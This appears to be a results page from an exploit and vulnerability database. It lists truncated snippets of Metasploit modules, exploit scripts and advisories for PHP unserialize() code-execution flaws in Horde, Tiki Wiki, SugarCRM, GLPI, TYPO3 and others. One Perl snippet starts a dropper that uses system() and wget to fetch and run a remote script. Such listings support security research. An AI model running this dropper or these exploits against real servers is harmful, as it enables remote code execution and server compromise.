1318 matches found
Horde Framework Unserialize PHP Code Execution
No description provided by source. This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def...
Invision IP.Board <= 3.3.4 unserialize() PHP Code Execution
No description provided by source. This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit web site for more information on licensing and terms of use. http://metasploit.com/ require 'msf/core' class Metasploit3...
Tiki Wiki <= 8.3 unserialize() PHP Code Execution
No description provided by source. This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit web site for more information on licensing and terms of use. http://metasploit.com/ require 'msf/core' class Metasploit3...
PHP < 4.5.0 - unserialize Overflow
No description provided by source. $Id$ This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and terms of use. http://metasploit.com/framework/ require...
CakePHP <= 1.3.5 / 1.2.8 Cache Corruption Exploit
No description provided by source. $Id: cakephpcachecorruption.rb 11579 2011-01-14 16:25:37Z jduck $ This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and...
PHP 3/4/5 Multiple Local And Remote Vulnerabilities (1)
No description provided by source. source: http://www.securityfocus.com/bid/11964/info PHP4 and PHP5 are reported prone to multiple local and remote vulnerabilities that may lead to code execution within the context of the vulnerable process. The following specific issues are reported: A heap-bas...
Tiki Wiki CMS Groupware <= 8.3 "unserialize()" PHP Code Execution
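Tiki Wiki CMS Groupware 'unserialize' multiple remote PHP code execution vulnerabilities. Vulnerability type: design flaw. Cause: Tiki Wiki CMS Groupware versions prior to v6.9 and 9.3 contain a security vulnerability: certain scripts call "unserialize" on user-controlled input, and an attacker can exploit this to inject and execute arbitrary PHP code in the affected application. Remediation: update to the latest version http://info.tiki.org/article210-Tiki-10-0-is-here ?php /...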
PHP <= 4.3.9 & phpBB 2.x with unserialize() Remote Exploit (compiled)
No description provided by source...
SugarCRM CE <= 6.3.1 "unserialize()" PHP Code Execution
No description provided by source. ?php / ------------------------------------------------------- SugarCRM CE = 6.3.1 unserialize PHP Code Execution ------------------------------------------------------- author...........: Egidio Romano aka EgiX mail.............: n0b0d13satgmaildotcom software...
RunCms <= 1.5.2 (debug_show.php) Remote SQL Injection Exploit
No description provided by source. ?php printr' -------------------------------------------------------------------------- RunCms = 1.5.2 /class/debug/debugshow.php sql injection / credentials disclosure exploit by rgod mail: retrog at alice dot it site: http://retrogod.altervista.org dork: Runcm...
Horde Framework Unserialize PHP Code Execution
ported from metasploit by irrlicht june 2014 modify dropper url and run use strict; use warnings; use LWP::UserAgent; use WWW::Mechanize; use MIME::Base64; if !$ARGV0 print "specify full login.php url\n"; exit; my $dropper = 'system"mkdir /tmp/\" \"; cd /tmp/\" \"; wget -O deploy.pl...
PHP 5.4.x < 5.4.30 Multiple Vulnerabilities
According to its banner, the version of PHP 5.4.x installed on the remote host is a version prior to 5.4.30. It is, therefore, affected by the following vulnerabilities: - Boundary checking errors exist related to the Fileinfo extension, Composite Document Format (CDF) handling and the functions...
openSUSE Security Update : typo3-cms-4_5 (openSUSE-SU-2014:0813-1)
typo3-cms-4_5 was updated to version 4.5.34 to fix eight security vulnerabilities and several other bugs. These security problems were fixed: - Add trusted HTTP_HOST configuration (CVE-2014-3941) - XSS in old extension manager information function (CVE-2014-3943) - XSS in new content element wizard...
CVE-2013-2225
inc/ticket.class.php in GLPI 0.83.9 and earlier allows remote attackers to unserialize arbitrary PHP objects via the _predefined_fields parameter to front/ticket.form.php...
CVE-2013-2225
CVE-2013-2225 affects GLPI: inc/ticket.class.php in GLPI 0.83.9 and earlier allows remote attackers to unserialize arbitrary PHP objects via _predefined_fields in front/ticket.form.php. OpenVAS/Mageia advisories confirm the issue and indicate a fix was released: upgrade to GLPI 0.83.91 (and patch...
CVE-2013-2225
inc/ticket.class.php in GLPI 0.83.9 and earlier allows remote attackers to unserialize arbitrary PHP objects via the _predefined_fields parameter to front/ticket.form.php...
Code injection
inc/ticket.class.php in GLPI 0.83.9 and earlier allows remote attackers to unserialize arbitrary PHP objects via the _predefined_fields parameter to front/ticket.form.php...
CVE-2013-2225
inc/ticket.class.php in GLPI 0.83.9 and earlier allows remote attackers to unserialize arbitrary PHP objects via the _predefined_fields parameter to front/ticket.form.php...
Multiple Vulnerabilities in TYPO3 CMS
It has been discovered that TYPO3 CMS is vulnerable to Cross-Site Scripting, Insecure Unserialize, Improper Session Invalidation, Authentication Bypass, Information Disclosure and Host Spoofing. Component Type: TYPO3 CMS Vulnerability Types: Cross-Site Scripting, Insecure Unserialize, Improper...
Horde Framework Unserialize PHP Code Execution (CVE-2014-1691)
An arbitrary PHP code execution vulnerability has been reported in Horde. An attacker can exploit this vulnerability to execute arbitrary code with the permissions of the web server...